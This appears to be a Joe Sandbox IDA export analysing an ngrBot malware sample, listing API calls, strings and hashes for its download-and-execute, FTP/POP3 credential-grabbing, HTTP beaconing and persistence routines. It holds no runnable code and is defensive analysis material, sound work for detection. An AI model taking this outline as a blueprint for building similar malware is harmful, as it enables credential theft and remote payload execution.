                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sleep$CriticalSectionstrtok$??3@EnterFreeHeapLeave_stricmplstrlenmemsetstrstrtoupperwvsprintf
                                                                  • String ID: ERR$[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]$[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$dlds$exe$http://
                                                                  • API String ID: 3190375853-4059846736
                                                                  • Opcode ID: f986f074c990c97db4eed9869a16002373fbc8f9448da8be0168c0ee2a9dd183
                                                                  • Instruction ID: 3e91a635f220bf852c08f817978a574d76a59c4a97b8cc3da9307b122ab73dc0
                                                                  • Opcode Fuzzy Hash: f986f074c990c97db4eed9869a16002373fbc8f9448da8be0168c0ee2a9dd183
                                                                  • Instruction Fuzzy Hash: 0591B3B5E00205ABD710DBD5CC85ABFB3B8EB94704F20843AE905B72C5D778E945C6AE
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(003AB3C8), ref: 0036DDCF
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A013
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A04F
                                                                  • strstr.MSVCRT ref: 0036DDF4
                                                                  • lstrlenA.KERNEL32(?), ref: 0036DE11
                                                                  • toupper.MSVCRT ref: 0036DE28
                                                                  • GetLastError.KERNEL32 ref: 0036DE68
                                                                  • GetLastError.KERNEL32 ref: 0036DE71
                                                                  • GetLastError.KERNEL32 ref: 0036DE7A
                                                                  • GetLastError.KERNEL32 ref: 0036DE83
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036DEA8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036DF16
                                                                  • _stricmp.MSVCRT(?,00000000), ref: 0036DF3D
                                                                  • Sleep.KERNEL32(00000032), ref: 0036DF6A
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"],?,?,?,00000000), ref: 0036E021
                                                                  • GetLastError.KERNEL32 ref: 0036E059
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] Error creating process "%S" [e="%d"],?,?,?,00000000), ref: 0036E037
                                                                    • Part of subcall function 0036BA00: memset.MSVCRT ref: 0036BA1E
                                                                    • Part of subcall function 0036BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0036BA42
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E0DD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036E0EB
                                                                  • LeaveCriticalSection.KERNEL32(003AB3C8), ref: 0036E0F8
                                                                  Strings
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0036E08E
                                                                  • [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"], xrefs: 0036E030
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0036E017
                                                                  • ERR, xrefs: 0036DFEC
                                                                  • [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s), xrefs: 0036DFFE
                                                                  • http://, xrefs: 0036DDEE
                                                                  • dlds, xrefs: 0036DE44, 0036DFA6
                                                                  • [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d, xrefs: 0036E0A5
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0036E080
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0036E060
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0036E042
                                                                  • exe, xrefs: 0036DEE4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sleep$CriticalSectionstrtok$??3@EnterFreeHeapLeave_stricmplstrlenmemsetstrstrtoupperwvsprintf
                                                                  • String ID: ERR$[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]$[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$dlds$exe$http://
                                                                  • API String ID: 3190375853-4059846736
                                                                  • Opcode ID: 677c5a195f558491eea96f594a5a79774bced9725ab31d434562c1e30fe814d5
                                                                  • Instruction ID: 4ea52c0c7527510d24600fc4040e728e0b46326845e4aec4a9f9b16a58c6a432
                                                                  • Opcode Fuzzy Hash: 677c5a195f558491eea96f594a5a79774bced9725ab31d434562c1e30fe814d5
                                                                  • Instruction Fuzzy Hash: 4391B479F00205AFD726DB98CC86EBFB7BCAB54700F15C018E50A9B289D7B5AE40C761
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407898
                                                                  • lstrlenA.KERNEL32(-00000005,00000000,00000000,?,?,?,00000000,?), ref: 0040795D
                                                                  • _snprintf.MSVCRT ref: 0040797B
                                                                  • _snprintf.MSVCRT ref: 004079B7
                                                                  • lstrlenA.KERNEL32(0044A2B0,?,00000000,?), ref: 00407A5A
                                                                  • lstrlenA.KERNEL32(0044A4B0), ref: 00407A69
                                                                  • _snprintf.MSVCRT ref: 00407AD9
                                                                  • _stricmp.MSVCRT(0044A2B0,anonymous,00000000,000001FF,ftp://%s:%s@%s:%d,0044A2B0,0044A4B0,00000000,00000000), ref: 00407AE8
                                                                  • _snprintf.MSVCRT ref: 00407B66
                                                                    • Part of subcall function 00402460: GetProcessHeap.KERNEL32(?,004020DE,?), ref: 0040246C
                                                                    • Part of subcall function 00402460: HeapAlloc.KERNEL32(?,00000008,004020DE,?,004020DE,?), ref: 0040247E
                                                                  • lstrcpyA.KERNEL32(0044A2B0,00411335,?,00000000,?), ref: 00407BBC
                                                                  • lstrcpyA.KERNEL32(0044A4B0,00411335), ref: 00407BC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$lstrlen$Heaplstrcpy$AllocProcess_stricmpmemset
                                                                  • String ID: %s.%s (p='%S')$%s:%s@%s:%d$FEAT$LIST$PASS$PASV$STAT$TYPE$USER$anonymous$block$ftp://%s:%s@%s:%d$ftpgrab$ftplog$pop3://%s:%s@%s:%d$popgrab$poplog
                                                                  • API String ID: 389836911-2374598668
                                                                  • Opcode ID: 0e370dc052ecfbd7fb3f7bbf5e19c0d235bc1fe5bf087733f40848c40f85a7b1
                                                                  • Instruction ID: 4ec03147278e1debc2a34b89434d2914110906d41f31d0f6576211e9510b2703
                                                                  • Opcode Fuzzy Hash: 0e370dc052ecfbd7fb3f7bbf5e19c0d235bc1fe5bf087733f40848c40f85a7b1
                                                                  • Instruction Fuzzy Hash: 8D811B70F883556AFB20EF648C49FAF3A645B01708F19447BE904B23D1D6BCB994865F
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00367898
                                                                  • lstrlenA.KERNEL32(-00000005,00000000,00000000,?,?,?,00000000,?), ref: 0036795D
                                                                  • _snprintf.MSVCRT ref: 0036797B
                                                                  • _snprintf.MSVCRT ref: 003679B7
                                                                  • lstrlenA.KERNEL32(003AA2B0,?,00000000,?), ref: 00367A5A
                                                                  • lstrlenA.KERNEL32(003AA4B0), ref: 00367A69
                                                                  • _snprintf.MSVCRT ref: 00367AD9
                                                                  • _stricmp.MSVCRT(003AA2B0,anonymous,00000000,000001FF,ftp://%s:%s@%s:%d,003AA2B0,003AA4B0,00000000,00000000), ref: 00367AE8
                                                                  • _snprintf.MSVCRT ref: 00367B66
                                                                    • Part of subcall function 00362460: GetProcessHeap.KERNEL32(?,003620DE,?), ref: 0036246C
                                                                    • Part of subcall function 00362460: HeapAlloc.KERNEL32(?,00000008,003620DE,?,003620DE,?), ref: 0036247E
                                                                  • lstrcpyA.KERNEL32(003AA2B0,00371335,?,00000000,?), ref: 00367BBC
                                                                  • lstrcpyA.KERNEL32(003AA4B0,00371335), ref: 00367BC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$lstrlen$Heaplstrcpy$AllocProcess_stricmpmemset
                                                                  • String ID: %s.%s (p='%S')$%s:%s@%s:%d$FEAT$LIST$PASS$PASV$STAT$TYPE$USER$anonymous$block$ftp://%s:%s@%s:%d$ftpgrab$ftplog$pop3://%s:%s@%s:%d$popgrab$poplog
                                                                  • API String ID: 389836911-2374598668
                                                                  • Opcode ID: 7fc4ad55d98ef60cd8711143c3126e87d22817d074550dd0e271ddad913021d8
                                                                  • Instruction ID: 6c87243e6df62feda7b675a45a262f64d400c7ad8946784ab9d90273cf123207
                                                                  • Opcode Fuzzy Hash: 7fc4ad55d98ef60cd8711143c3126e87d22817d074550dd0e271ddad913021d8
                                                                  • Instruction Fuzzy Hash: BC815C72A487456ADB33AF68CC46FAE3AD8DB0271CF89C415F408A7299D7B49D80C653
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00370930
                                                                  • GetProcessHeap.KERNEL32 ref: 0037093D
                                                                  • memset.MSVCRT ref: 0037095D
                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00370982
                                                                  • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000,00000005), ref: 003709BF
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                  • GetTickCount.KERNEL32 ref: 003709CF
                                                                  • Sleep.KERNEL32 ref: 00370A05
                                                                  • OpenMutexA.KERNEL32 ref: 00370A17
                                                                  • GetLastError.KERNEL32 ref: 00370A27
                                                                  • GetLastError.KERNEL32 ref: 00370A2E
                                                                  • ExitProcess.KERNEL32 ref: 00370A32
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 00370A3D
                                                                  • _snprintf.MSVCRT ref: 00370A60
                                                                  • ExitProcess.KERNEL32 ref: 00370A79
                                                                  • ExitProcess.KERNEL32 ref: 00370A98
                                                                  • GetModuleFileNameW.KERNEL32(00000000,003AAFB0,00000208), ref: 00370ACC
                                                                  • wsprintfW.USER32 ref: 00370ADE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,003AADA0,000000FF,003AAC50,00000104,00000000,00000000), ref: 00370B06
                                                                  • lstrcpynW.KERNEL32(003AB1B8,00000000,00000208), ref: 00370B13
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,003AB3E0,00000104,00000000,00000000), ref: 00370B2E
                                                                  • Sleep.KERNEL32(000009C4), ref: 00370B59
                                                                  • ExitProcess.KERNEL32 ref: 00370B70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exitmemset$lstrlen$ByteCharErrorFileLastModuleMultiNameSleepWide_snprintf$CountExecuteHeapMutexOpenShellTick_vsnprintflstrcpynwsprintf
                                                                  • String ID: %08x$%s\Microsoft\%s.exe$30e44aa1$OPEN$ngrBot$running
                                                                  • API String ID: 2173303953-2917108782
                                                                  • Opcode ID: 2a2dfe5072ed500c96ebfa8ca99d62f5fca3c6ba4df87e00ad974e162666ad5f
                                                                  • Instruction ID: fda1c0cb62378f9867686b1371f5ffeb9c9b2f334cf5d9e22c268556812758b4
                                                                  • Opcode Fuzzy Hash: 2a2dfe5072ed500c96ebfa8ca99d62f5fca3c6ba4df87e00ad974e162666ad5f
                                                                  • Instruction Fuzzy Hash: B451D876A80304BBE777A7B49C4BFDA3A6C9B45B11F00C454F70DEA1D2DAF455808B62
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,0041037C,?,004132E4,00000000,00000000,httpi), ref: 0040FE11
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE40
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040FE47
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE5E
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE72
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FE7C
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000002), ref: 0040FE89
                                                                  • strtok.MSVCRT ref: 0040FEA2
                                                                  • lstrcpyA.KERNEL32(00000000,00411335), ref: 0040FEBB
                                                                  • lstrcatA.KERNEL32(00000000,004119DC), ref: 0040FECD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040FEE4
                                                                  • _memicmp.MSVCRT ref: 0040FEEF
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040FF0A
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF14
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0040FF1F
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF33
                                                                  • lstrcatA.KERNEL32(00000000,00413328), ref: 0040FF4B
                                                                  • strstr.MSVCRT ref: 0040FF5C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040FF65
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF6B
                                                                  • strncat.MSVCRT ref: 0040FF77
                                                                  • lstrcatA.KERNEL32(00000000,00412B54), ref: 0040FF85
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FF8F
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0040FF9A
                                                                  • lstrlenA.KERNEL32(?), ref: 0040FFAA
                                                                    • Part of subcall function 0040FD80: isalnum.MSVCRT ref: 0040FDAC
                                                                    • Part of subcall function 0040FD80: strchr.MSVCRT ref: 0040FDBE
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0040FFBE
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040FFCB
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040FFDF
                                                                  • strtok.MSVCRT ref: 0040FFEC
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0041000F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0041001C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0041003C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$AllocFree$strtok$Process_memicmpisalnumlstrcpystrchrstrncatstrstr
                                                                  • String ID:
                                                                  • API String ID: 423345748-0
                                                                  • Opcode ID: ae5a00cf89488068b5b6207a80ca6a947a741f35cae490951e5afd2dcd30bff6
                                                                  • Instruction ID: ecdf31bace6aa1cfd498af2b81100673c9cff0bf93b629e0d4807f5436e9076f
                                                                  • Opcode Fuzzy Hash: ae5a00cf89488068b5b6207a80ca6a947a741f35cae490951e5afd2dcd30bff6
                                                                  • Instruction Fuzzy Hash: 75616075A00205BBDB209FA5DC85EFF7B78AF48705F10412AFA04E7390DA78DD8587A8
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,0037037C,?,003732E4,00000000,00000000,httpi), ref: 0036FE11
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE40
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0036FE47
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE5E
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE72
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FE7C
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000002), ref: 0036FE89
                                                                  • strtok.MSVCRT ref: 0036FEA2
                                                                  • lstrcpyA.KERNEL32(00000000,00371335), ref: 0036FEBB
                                                                  • lstrcatA.KERNEL32(00000000,003719DC), ref: 0036FECD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036FEE4
                                                                  • _memicmp.MSVCRT ref: 0036FEEF
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0036FF0A
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF14
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0036FF1F
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF33
                                                                  • lstrcatA.KERNEL32(00000000,00373328), ref: 0036FF4B
                                                                  • strstr.MSVCRT ref: 0036FF5C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036FF65
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF6B
                                                                  • strncat.MSVCRT ref: 0036FF77
                                                                  • lstrcatA.KERNEL32(00000000,00372B54), ref: 0036FF85
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FF8F
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 0036FF9A
                                                                  • lstrlenA.KERNEL32(?), ref: 0036FFAA
                                                                    • Part of subcall function 0036FD80: isalnum.MSVCRT ref: 0036FDAC
                                                                    • Part of subcall function 0036FD80: strchr.MSVCRT ref: 0036FDBE
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0036FFBE
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036FFCB
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0036FFDF
                                                                  • strtok.MSVCRT ref: 0036FFEC
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0037000F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0037001C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0037003C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$AllocFree$strtok$Process_memicmpisalnumlstrcpystrchrstrncatstrstr
                                                                  • String ID:
                                                                  • API String ID: 423345748-0
                                                                  • Opcode ID: 22e780dd61ca2fa5d9b77d1aabed33c7d822d9b4b6d541a8673515bc87deee7a
                                                                  • Instruction ID: f423e5c862619d82f76e769ad20f7700535f8f1fbd573f5aeeef182b51a3f8b6
                                                                  • Opcode Fuzzy Hash: 22e780dd61ca2fa5d9b77d1aabed33c7d822d9b4b6d541a8673515bc87deee7a
                                                                  • Instruction Fuzzy Hash: A8616176A00205BFDB229BA8DC85EBF777CAB48754F108119F908DB244DB78D981D7A0
                                                                  APIs
                                                                  • memset.MSVCRT ref: 004099D5
                                                                  • memset.MSVCRT ref: 004099EF
                                                                  • WSAStartup.WS2_32(00000002,?), ref: 00409A00
                                                                    • Part of subcall function 00409300: inet_addr.WS2_32(n"@), ref: 00409308
                                                                    • Part of subcall function 00409300: gethostbyname.WS2_32(n"@), ref: 00409313
                                                                  • htons.WS2_32(00000050), ref: 00409A28
                                                                  • GetTickCount.KERNEL32(00000050,?), ref: 00409A3A
                                                                  • GetTickCount.KERNEL32 ref: 00409A4D
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 00409A7B
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00409A96
                                                                  • connect.WS2_32(?,?,00000010), ref: 00409AB1
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 00409ABE
                                                                  • GetTickCount.KERNEL32 ref: 00409AC4
                                                                  • lstrcpyA.KERNEL32(00000000,X-a: b), ref: 00409AFE
                                                                  • lstrcpyA.KERNEL32(00000000,Connection: Close), ref: 00409B0C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409B0F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00409B41
                                                                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000), ref: 00409B51
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409B5E
                                                                  • GetTickCount.KERNEL32 ref: 00409B66
                                                                  • Sleep.KERNEL32(000009C4), ref: 00409B7F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00409BBE
                                                                  • GetTickCount.KERNEL32(?,00000000,00000000,00000000), ref: 00409BD2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00409BE4
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00409C1E
                                                                  • closesocket.WS2_32(?), ref: 00409C38
                                                                  • GetTickCount.KERNEL32(?,?,00000000,00000000,00000000), ref: 00409C43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleeplstrlensend$lstrcpymemset$Startupclosesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID: Connection: Close$X-a: b
                                                                  • API String ID: 1989272289-3524857483
                                                                  • Opcode ID: f35408606652e46185f76e06ca93f5c32642c9aae835a1c13394b773f809ad83
                                                                  • Instruction ID: 7cb26ec54ccc07fb4d2b8a21b45d65960398a2891f86cebd2f8e54a067ade358
                                                                  • Opcode Fuzzy Hash: f35408606652e46185f76e06ca93f5c32642c9aae835a1c13394b773f809ad83
                                                                  • Instruction Fuzzy Hash: 2F713071940254BBD710EBA1DD45FDEB378AB88704F10897AEA09F31D1D674AE81CF98
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003699D5
                                                                  • memset.MSVCRT ref: 003699EF
                                                                  • WSAStartup.WS2_32(00000002,?), ref: 00369A00
                                                                    • Part of subcall function 00369300: inet_addr.WS2_32(n"6), ref: 00369308
                                                                    • Part of subcall function 00369300: gethostbyname.WS2_32(n"6), ref: 00369313
                                                                  • htons.WS2_32(00000050), ref: 00369A28
                                                                  • GetTickCount.KERNEL32(00000050,?), ref: 00369A3A
                                                                  • GetTickCount.KERNEL32 ref: 00369A4D
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 00369A7B
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00369A96
                                                                  • connect.WS2_32(?,?,00000010), ref: 00369AB1
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 00369ABE
                                                                  • GetTickCount.KERNEL32 ref: 00369AC4
                                                                  • lstrcpyA.KERNEL32(00000000,X-a: b), ref: 00369AFE
                                                                  • lstrcpyA.KERNEL32(00000000,Connection: Close), ref: 00369B0C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00369B0F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00369B41
                                                                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000), ref: 00369B51
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00369B5E
                                                                  • GetTickCount.KERNEL32 ref: 00369B66
                                                                  • Sleep.KERNEL32(000009C4), ref: 00369B7F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00369BBE
                                                                  • GetTickCount.KERNEL32(?,00000000,00000000,00000000), ref: 00369BD2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00369BE4
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00369C1E
                                                                  • closesocket.WS2_32(?), ref: 00369C38
                                                                  • GetTickCount.KERNEL32(?,?,00000000,00000000,00000000), ref: 00369C43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleeplstrlensend$lstrcpymemset$Startupclosesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID: Connection: Close$X-a: b
                                                                  • API String ID: 1989272289-3524857483
                                                                  • Opcode ID: aa921787c2fd7cae5862af6a1dade1947ecb8d2fd0d23d107454cba74a7930f3
                                                                  • Instruction ID: 5930f3b0dcbe1883dc63007a31630af5433df169f896a85eb7d1770209fafab4
                                                                  • Opcode Fuzzy Hash: aa921787c2fd7cae5862af6a1dade1947ecb8d2fd0d23d107454cba74a7930f3
                                                                  • Instruction Fuzzy Hash: 7371EC72900118ABD732EBA4DC85FDE77ADEB88700F51C956EA0DEB184D6749E41CF90
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Alloc_memicmp_snprintfmemsetstrtok$Freelstrcpynsscanf
                                                                  • String ID: HTTP$Host: $POST /%1023s$http://%s/$http://%s/%s
                                                                  • API String ID: 3179755921-1264106924
                                                                  • Opcode ID: 6a7b048e49f5e46d75e327f42497c877a8154ec3d200563e306c4c1fee2733ba
                                                                  • Instruction ID: b9d19011a538f4e63f226923da5865426bd74754d0a48babbb538e4dd702a74a
                                                                  • Opcode Fuzzy Hash: 6a7b048e49f5e46d75e327f42497c877a8154ec3d200563e306c4c1fee2733ba
                                                                  • Instruction Fuzzy Hash: 704107B6D8021877D720EB618D42FEB736CDB44750F0444A6FB08F2181E6B89A958BED
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Alloc_memicmp_snprintfmemsetstrtok$Freelstrcpynsscanf
                                                                  • String ID: HTTP$Host: $POST /%1023s$http://%s/$http://%s/%s
                                                                  • API String ID: 3179755921-1264106924
                                                                  • Opcode ID: 7f7ac1848b959075ae68d994c6568a9f2d74d18bfd95b842e533003d5e6dec95
                                                                  • Instruction ID: c5b3942b70ec49dd057bcc01e589a3d67f3b2ee074f4d30028f536f15dbf91e7
                                                                  • Opcode Fuzzy Hash: 7f7ac1848b959075ae68d994c6568a9f2d74d18bfd95b842e533003d5e6dec95
                                                                  • Instruction Fuzzy Hash: 8641D6B6940218BBD736A7A48C42FEBB3ACDB45710F048594FB0CE6145E7749A858BE1
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00406A68
                                                                  • lstrlenA.KERNEL32 ref: 00406B03
                                                                  • _memicmp.MSVCRT ref: 00406B0E
                                                                  • _memicmp.MSVCRT ref: 00406B22
                                                                  • _memicmp.MSVCRT ref: 00406B36
                                                                  • sscanf.MSVCRT ref: 00406B4F
                                                                  • sscanf.MSVCRT ref: 00406B69
                                                                  • lstrlenA.KERNEL32(?), ref: 00406BD5
                                                                  • SetFileAttributesW.KERNEL32(0044A710,00000080), ref: 00406C31
                                                                  • MoveFileExW.KERNEL32(0044A710,00000000,00000004), ref: 00406C40
                                                                  • closesocket.WS2_32(?), ref: 00406C60
                                                                  • ExitThread.KERNEL32 ref: 00406C67
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A335
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A34F
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A369
                                                                    • Part of subcall function 0040A310: _vsnprintf.MSVCRT ref: 0040A382
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A39A
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                    • Part of subcall function 0040A310: _snprintf.MSVCRT ref: 0040A3CC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A3EC
